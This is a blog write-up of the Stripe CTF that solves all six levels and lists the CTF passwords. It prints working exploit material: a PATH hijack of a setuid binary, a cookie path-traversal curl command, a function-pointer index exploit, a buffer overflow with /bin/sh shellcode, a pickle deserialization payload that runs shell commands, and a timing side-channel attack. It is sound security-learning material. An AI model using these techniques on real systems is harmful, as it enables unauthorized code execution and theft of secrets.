So, a couple weeks back, I took part in the Stripe CTF. Now that they’ve released the VM images of the CTF, and their own example solutions (see here for the wrap-up, here for the code), I figured I’d write my own post-mortem. I managed to solve all 6 levels, even though I’m not entirely happy with the solution for the final level (level06). Below, you can find how I solved each level. Some of my solutions were slightly edited for clarity (e.g. to remove stuff like debugging code).
Level01
The CTF starts off with the password e9gx26YEb2
, and the instructions to SSH
to level01@ctf.stri.pe
. That’s simple enough, so I went ahead and did that.
For each level, you can read the code for that level to determine how best to
proceed to the next level. level01 started off with a simple program that
executed system("date")
. The binary is setuid as level02, so if we can
somehow get it to execute our own code, we can read the next level’s password
file (which was at /home/levelXX/.password
for every level).
system()
finds the command through the PATH
environment variable, which
means that if you change that, it’ll execute a custom “date” binary instead.
So, it’s simple enough to write a pretty basic program or shell script that
opens and prints the contents of /home/level02/.password
, which will then be
printed by the level02 binary itself. Problem solved! You could do other stuff
like launch a shell, or copy the password file somewhere else, but it’s not
necessary.
In short:
level01@ctf6:/tmp/tmp.TuSk2nyts9$ echo "cat /home/level02/.password" > date
level01@ctf6:/tmp/tmp.TuSk2nyts9$ chmod +x date
level01@ctf6:/tmp/tmp.TuSk2nyts9$ PATH=`pwd` /levels/level01
Current time: kxlVXUvzv
The password to level02 is: kxlVXUvzv
Level02
In this level, you’re given a PHP script running as level03 that will greet you. It does this by setting a cookie with a file path in it, and then saving the username and age you give it in this file. On further visits to the page, it’ll read path from the cookie, read the associated file, and then print ‘You’re NAME, and your age is AGE’.
Of course, the problem with all of this is, the file path is being stored on
the client side. This means that if we can somehow get the PHP script to read
the password file, it will print it out for us! Remember, the password file for
the next level is at /home/level03/.password
, and the relevant line in the
PHP script is:
$out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
So, all you need to do is create a path that will resolve to the password file,
and pass it as a cookie. I did it in curl as a one-liner. Note that the site
uses HTTP Digest Authentication, so you need to give the username and password
for this level. The switch --digest
will tell curl to use digest
authentication, so the command is:
curl -s --cookie "user_details=../../home/level03/.password" --user level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php | grep "<p>"
The password to level03 is: Or0m4UX07b
Level03
This level is where things start to get tricky. The source code for level03
shows that we have a program that converts the first parameter to a number, and
then uses that number to call a function from an array of function pointers,
passing the second parameter as an argument. There’s also a bug in the
capitalize()
- printf("\n", str);
has an extra parameter. I didn’t need it,
though. The important bits of code are as follows:
typedef int (*fn_ptr)(const char *);
// [...]
int main(int argc, char **argv)
{
int index;
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
// [...]
index = atoi(argv[1]);
if (index >= NUM_FNS) {
// [...]
exit(-1);
}
return truncate_and_call(fns, index, argv[2]);
}
// [...]
int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
char buf[64];
// Truncate supplied string
strncpy(buf, user_string, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\0';
return fns[index](buf);
}
int run(const char *str)
{
// This function is now deprecated.
return system(str);
}
The four functions you can call are: to_upper
, to_lower
, capitalize
,
length
, and do exactly what they say. However, there’s also a run()
function
(at address 0x0804875B) that was left in the binary, but isn’t in the array, as
seen above. That function will call system()
on the provided argument. If we
could somehow get that function to run, we’d be able to execute code of our
liking! Thankfully, the program doesn’t check for negative numbers, so we’re in
luck.
If we run the program under gdb (which, by the way, clears the setuid bit), we can observe that the buffer buf, which contains our command-line string, is placed on the stack at address 0xffb3712c (this will be different for each run, due to ASLR), and our function pointers are at address 0xffb3719c. The gdb transcript is:
(gdb) break main
Breakpoint 1 at 0x80487d8: file level03.c, line 68.
(gdb) run 0 asdf
(gdb) x fns
0xffb3719c: 0xffb371b8
(gdb) break truncate_and_call
Breakpoint 2 at 0x8048780: file level03.c, line 57.
(gdb) c
(gdb) x buf
0xffb3712c: 0x00000000
If you look at the layout of the stack in-memory, it would look something like this:
0xffb3712c buf[64]
[...]
0xffb3719c fns: &to_upper
fns: &to_lower
fns: &capitalize
fns: &length
If you subtract the two addresses you get 0xffb3719c - 0xffb3712c = 0x70,
which, when we divide by the size of a pointer, is 0x28. So, running something
like /levels/level03 -28 blah
would call fns[-28]
, which is &fns - 28 *
size of a pointer, which works out to be &fns - 0x70. From above, we see that
this would call a function pointer that’s stored in the buf[]
array. Now, we
can put things in this array, by passing them on the command line, and
therefore we can call an arbitrary function pointer we control. Things are a
bit more complex - we need to get the program to run a script we control, and
we’re in some temporary directory. So, we need to calculate the length of the
directory (20 characters, for me), and then place a function pointer there. So,
here’s what I ran to gain control:
export VAL=`pwd``printf "\x5B\x87\x04\x08"`
echo "#/bin/bash" >> test2
echo "/bin/cat /home/level04/.password" >> test2
/levels/level03 -23 $VAL
Note that “\x5B\x87\x04\x08” is the little-endian hexadecimal representation of our function pointer 0x0804875B, which is the address of the run() function in memory.
To summarize: the program runs, and then eventually executes the line return
fns[index](buf);
. In our case, index
is -23, which reads a function pointer
from offset 20 in the buffer buf[]
. We’ve placed our little-endian function
pointer there, so the program will execute something like: return 0x0804875B
.
And, we’ve created the file /tmp/whatever123456/\x5B\x87\x04\x08
, which
contains a shell script that reads the next level’s password file.
The final result - our password for level04 is: i5cBbPvPCpcP
Note: Depending on the length of the temporary directory path, we may have to change things or add padding to our filename. This would be as simple as adding 1-3 bytes of “a”s before the function pointer and modifying our index by 1. Remember - the function pointer must start on a multiple of 4 characters!
Level04
This level is the second-hardest level in this entire CTF, in my opinion. You’re given a very simple program, with the following code somewhere in it:
void fun(char *str)
{
char buf[1024];
strcpy(buf, str);
}
The parameter str
is argv[1]
(called like: fun(argv[1]);
), so we can put
arbitrary data into it. Now, the first thing to think of is: what happens if
the value of str is LONGER than 1024 characters? Well, strcpy
will happily
keep copying until it eventually reaches a null byte (0x00), so it’ll overwrite
whatever happens to be after that in memory. Thankfully for us, on x86 the
return address is at a higher address than the buffer pointer on the stack -
something like this:
buf[0]
buf[1]
...
buf[1023]
<other stuff>
return address
If we can overwrite that return address, we can cause the program to return (i.e. transfer execution) to an address we control. Of course, it’s not quite that easy. In this binary, we don’t have any handy run() function that will run another program for us. So, we need to be able to run some code we control, too. However, we have a problem. As I mentioned earlier, ASLR is enabled. This is a technology that’s designed to make it harder to do exactly this - exploit programs. Specifically what it does is randomize the addresses in-memory of various parts of a program - including the stack. So, we can’t simply use a hard-coded pointer to our buffer. No, we need to get tricky!
According to the documentation, “The strcpy() function shall return s1; no return value is reserved to indicate an error”. In short, it means it will return the address of our buffer. On x86, the return value of a function compiled with a standard calling convention (i.e. stdcall, cdecl, etc.) will be placed in the EAX register. So, we have an opportunity here. We overwrite the buf array, and also the return address. Once the function returns, it will transfer execution to a location we can specify. At offset 0x0804857b in the executable provided, there is a “CALL EAX” instruction. So, we can make the program return to an address that will then transfer execution to our buffer.
Once we’ve got execution transferred to our buffer, we need to do something with that. I settled on a quick exploit that would clear registers, push “/bin/sh” to stack, and then execute it - giving me shell access:
xor ecx,ecx ; 31c9
mul eax,ecx ; f7e1
push ecx ; 51
push 68732F2Fh ; 682f2f7368
push 6E69622Fh ; 682f62696e
mov ebx,esp ; 89e3
mov al,0Bh ; b00b
int 80h ; cd80
I’ve provided the hex code of the exploit in the comments, for reference. Note
the lack of null (0x00) bytes - since strcpy()
will copy up to the first null
byte, if there’s one in the exploiit, it will cause the exploit to fail. Thus,
we simply clear eax and ecx, push ecx (which is now 0x00000000) to the stack
for our null terminator, push “/bin/sh” encoded as hex, and then call the
system call sys_execve
(index 0x0B) to run it.
A couple technical notes: if we simply run that as given, it’ll segfault.
Specifically what happens is that esp
is still pointing to our shellcode,
which means we’re actually overwriting our own code. I simply “cheated” and put
a bunch of “DEC ESP” commands at the beginning of the shellcode (hex 0x4C).
My final exploit string is (note that it’s all on one line):
export SC=`perl -e 'print "\x90" x 915 . "\x31\xc9\xf7\xe1" . "\x4c" x 100 . "\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" . "\x7b\x85\x04\x08" . "CCCC" x 10'` /levels/level04 $SC
From within the resulting shell, we can simply cat the password file, and we
get: fzfDGnSmd317
Level05
This one is actually pretty easy. There’s a Python script running that provides the ability to convert an input string to uppercase. We notice that the program serializes jobs with python’s pickle module, and then sends them to a series of workers, who then deserialize and process the job. Some excerpts from the program are:
@staticmethod
def deserialize(serialized):
logger.debug('Deserializing: %r' % serialized)
parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
match = parser.match(serialized)
direction = match.group(1)
data = match.group(2)
job = pickle.loads(match.group(3))
return direction, data, job
@staticmethod
def serialize(direction, data, job):
serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
logger.debug('Serialized to: %r' % serialized)
return serialized
And you can submit jobs like this:
curl localhost:9020 -d "uppercase me"
From this, we notice that the format of the serialized jobs is as follows:
type: blah; data: some data here; job: blah blah blah
So, we can force the program to deserialize our own custom data by manually crafting a request to the program that looks like this:
curl localhost:9020 -d "asdf; job: pickled data here"
This will cause the program to unpickle the data “pickled data here”. So, we can control the unpickling process - what now? Well, the pickle module is known to be insecure. As it says in the pickle documentation: “The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.“.
Also from this documentation, we see that there’s a magic method defined
(__reduce__
) that will be called when unpickling the class. We can therefore
write a custom class that will execute our own custom python code when it’s
unpickled:
q = '__import__("os").system("/bin/cat /home/level06/.password > /tmp/tmp.hSIOEi8xJ1/paswd")'
class Job(object):
def __reduce__(self):
return (eval, (q,))
I simply had the program read the password file, and then write it to the
temporary directory I was currently in. The method given should work for any
arbitrary system()
call, so other methods are possible. Note that simply
copying the file using cp doesn’t work, as cp will copy the permissions of the
file, too.
After we have this, we have to generate our pickled data:
x = pickle.dumps(Job())
And then urlencode it, since our web server will helpfully urldecode() it for us.
print urllib.quote(x)
Finally, we need to generate some data that will bypass the regex. Our final one-line command is:
curl localhost:9020 -d "asdf; job: c__builtin__%0Aeval%0Ap0%0A%28S%27__import__%28%22os%22%29.system%28%22/bin/cat%20/home/level06/.password%20%3E%20/tmp/tmp.hSIOEi8xJ1/paswd%22%29%27%0Ap1%0Atp2%0ARp3%0A."
From all this, we get: SF2w8qU1QDj
Level06
The final level! And, as is benefiting a final level, it’s HARD. I’ll link you to the source code of the program - go read it, and then come back here.
Done? OK. Here’s a short description of the vulnerability. The utility will print out a “.” to stderr on each comparison iteration. Upon the first mismatch, it will then fork(), and the child process will execl() /bin/echo to taunt the user. There are two potential attack vectors here:
The first idea is a timing attack. A fork() will cause the iteration with the first non-matching character to take longer than all other iterations. If we could somehow measure the length of each iteration, we could bruteforce each character one-at-a-time, reducing the complexity from keyspace^length passwords to keyspace * length passwords - a significant reduction.
The second is an output order attack. If we can somehow serialize the writes to stdout and stderr, we would see something like the following:
Welcome to the password checker!
.. Ha ha, your password is incorrect!
......
instead of
Welcome to the password checker!
........
Ha ha, your password is incorrect!
And this would then inform us that our second character is incorrect.
I tried a couple of approaches to this problem. My first thought was to use a FIFO (see mkfifo), hook both stdout and stderr to it, and then read one byte at a time, so that the writes would be serialized. This didn’t work, so I eventually decided to use a timing attack. My final code essentially did this:
clock_gettime(CLOCK_MONOTONIC, &t);
// [...]
ch = getchar();
clock_gettime(CLOCK_MONOTONIC, &t2);
And then, after getting the times, I would subtract them. This measures the difference between two successive dots being printed. On the iteration that is incorrect, the level06 binary would fork(), which would cause that iteration to take much longer than the others. Running this program like this:
#/bin/sh
/levels/level06 /home/the-flag/.password $1 2>&1 | ./timer
Would give a result like this:
level06@ctf4:/tmp/tmp.AuZnjcVqKo$ ./run.sh theflagaa
0.000001028
0.000001028
0.000001028
0.000001028
0.000001058
0.000001028
0.000001028
0.000001028
0.000101752
The first characters (“theflag”) are correct, but the next character (“a”) is not. This causes the last line to show an elapsed time approximately 100 times that of the other lines, thus showing that it is incorrect. Some Python scripting later, and I was able to brute-force the solution to the last level. It took several hours, due to other people using the machine, which would throw off the timing results.
A couple of quick notes: you have to link the program with -lrt, for the real-time library, and you should probably test a couple of times, to reduce the effect of other programs running on the same machine.
Finally, though, I was able to obtain the last password: theflagl0eFTtT5oi0nOTxO5
If I have some free time in the next couple weeks, I might go back to this question and come up with a “real” - i.e. elegant - solution to this problem. If I do, I’ll make another blog post!
Conclusion and Summary
In conclusion, this CTF was a lot of fun! It tested my knowledge of many different aspects of computer security, and generally made for an entertaining two days. Here’s a list of all the passwords, in order:
level01: e9gx26YEb2
level02: kxlVXUvzv
level03: Or0m4UX07b
level04: i5cBbPvPCpcP
level05: fzfDGnSmd317
level06: SF2w8qU1QDj
theflag: theflagl0eFTtT5oi0nOTxO5
Also, here’s some other writeups that people have published. Seeing how other people did things is always really cool!